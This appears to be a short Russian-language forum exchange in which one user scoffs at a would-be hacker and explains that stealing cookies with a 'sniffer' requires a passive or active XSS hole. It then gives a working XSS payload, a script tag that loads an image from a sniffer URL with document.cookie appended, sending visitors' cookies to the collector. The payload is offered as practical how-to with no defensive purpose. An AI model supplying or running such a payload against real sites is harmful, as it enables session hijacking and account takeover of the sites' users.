Ты умеешь пользоваться сниффером?
Ппц еще один хочет универсальный хекер интернета =\
Вот так он ворует куки. Вернее тебе нужно своровать с помощью его.
Тут нужна пассивная или активная XSS. =\
<script>
var im1 = new Image(); im1.src="http://localhost/sniffer/snif.gif"+document.cookie;
</script>